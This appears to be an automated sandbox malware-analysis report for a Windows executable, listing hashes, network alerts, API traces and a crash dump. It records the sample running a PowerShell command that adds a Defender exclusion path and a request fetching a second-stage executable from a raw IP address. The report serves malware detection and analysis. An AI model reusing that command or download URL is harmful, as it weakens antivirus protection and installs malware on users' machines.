Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 13, 2023, 10:51 p.m.	June 13, 2023, 10:53 p.m.

Size	26.3KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f97dd898670874b524df23d89dc6a12f`
SHA256	`841fc466a01841b07d66a4e99f2695592f9fc02c7bd24e5f3d74259a345d5110`
CRC32	`B440DCE0`
ssdeep	`384:/T1sZrG2iPQWRErIYib+W42KKxPxh8E9VF0Ny5dF:/BsZa2mf+UYib+WnxPxWEj`
Yara	PE_Header_Zero - PE File Signature Antivirus - Contains references to security software IsPE32 - (no description)

bz.exe "C:\Users\test22\AppData\Local\Temp\bz.exe"
1884
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
  2064
- Play.exe C:\Users\Public\Videos\Play.exe
  2240

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
181.142.211.88	Active	Moloch
51.79.49.73	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49163 -> 51.79.49.73:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 51.79.49.73:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 51.79.49.73:80 -> 192.168.56.103:49163	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 51.79.49.73:80 -> 192.168.56.103:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 51.79.49.73:80 -> 192.168.56.103:49163	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 51.79.49.73:80 -> 192.168.56.103:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 10:51 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 13, 2023, 10:51 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518990 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005186d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005191d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005193d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 10:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 13, 2023, 10:51 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 13, 2023, 10:51 p.m.	stacktrace: gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x75600d27 CallWindowProcA+0x1b GetClassNameA-0x95 user32+0x2794a @ 0x7560794a play+0x1b173 @ 0x41b173 play+0x1a7a0 @ 0x41a7a0 play+0x1b3d6 @ 0x41b3d6 IID_IVbaHost+0x236f3 UserDllMain-0x41bc4 msvbvm60+0x51d33 @ 0x72991d33 play+0x14834 @ 0x414834 IID_IVbaHost+0x239f4 UserDllMain-0x418c3 msvbvm60+0x52034 @ 0x72992034 IID_IVbaHost+0x23e5b UserDllMain-0x4145c msvbvm60+0x5249b @ 0x7299249b IID_IVbaHost+0x24027 UserDllMain-0x41290 msvbvm60+0x52667 @ 0x72992667 IID_IVbaHost+0x3b77 UserDllMain-0x61740 msvbvm60+0x321b7 @ 0x729721b7 IID_IVbaHost+0x386d UserDllMain-0x61a4a msvbvm60+0x31ead @ 0x72971ead IID_IVbaHost+0x36291 UserDllMain-0x2f026 msvbvm60+0x648d1 @ 0x729a48d1 IID_IVbaHost+0x418d8 UserDllMain-0x239df msvbvm60+0x6ff18 @ 0x729aff18 BASIC_CLASS_Release+0xfcaa IID_IVbaHost-0xff3d msvbvm60+0x1e703 @ 0x7295e703 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 play+0x16d6 @ 0x4016d6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 0f b7 46 14 89 55 fc 89 55 cc 89 45 c8 39 96 a0 exception.instruction: movzx eax, word ptr [esi + 0x14] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8fff06 registers.esp: 1635324 registers.edi: 0 registers.eax: 0 registers.ebp: 1636396 registers.edx: 0 registers.ebx: 1971191808 registers.esi: 1039493082 registers.ecx: 42477688	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 13, 2023, 10:51 p.m.

stacktrace:

gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x75600d27
CallWindowProcA+0x1b GetClassNameA-0x95 user32+0x2794a @ 0x7560794a
play+0x1b173 @ 0x41b173
play+0x1a7a0 @ 0x41a7a0
play+0x1b3d6 @ 0x41b3d6
IID_IVbaHost+0x236f3 UserDllMain-0x41bc4 msvbvm60+0x51d33 @ 0x72991d33
play+0x14834 @ 0x414834
IID_IVbaHost+0x239f4 UserDllMain-0x418c3 msvbvm60+0x52034 @ 0x72992034
IID_IVbaHost+0x23e5b UserDllMain-0x4145c msvbvm60+0x5249b @ 0x7299249b
IID_IVbaHost+0x24027 UserDllMain-0x41290 msvbvm60+0x52667 @ 0x72992667
IID_IVbaHost+0x3b77 UserDllMain-0x61740 msvbvm60+0x321b7 @ 0x729721b7
IID_IVbaHost+0x386d UserDllMain-0x61a4a msvbvm60+0x31ead @ 0x72971ead
IID_IVbaHost+0x36291 UserDllMain-0x2f026 msvbvm60+0x648d1 @ 0x729a48d1
IID_IVbaHost+0x418d8 UserDllMain-0x239df msvbvm60+0x6ff18 @ 0x729aff18
BASIC_CLASS_Release+0xfcaa IID_IVbaHost-0xff3d msvbvm60+0x1e703 @ 0x7295e703
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
play+0x16d6 @ 0x4016d6
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 0f b7 46 14 89 55 fc 89 55 cc 89 45 c8 39 96 a0
exception.instruction: movzx eax, word ptr [esi + 0x14]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8fff06
registers.esp: 1635324
registers.edi: 0
registers.eax: 0
registers.ebp: 1636396
registers.edx: 0
registers.ebx: 1971191808
registers.esi: 1039493082
registers.ecx: 42477688

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://51.79.49.73/crc/Play.exe

Performs some HTTP requests (1 event)

request

GET http://51.79.49.73/crc/Play.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74271000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76d71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ef1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73db1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02871000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
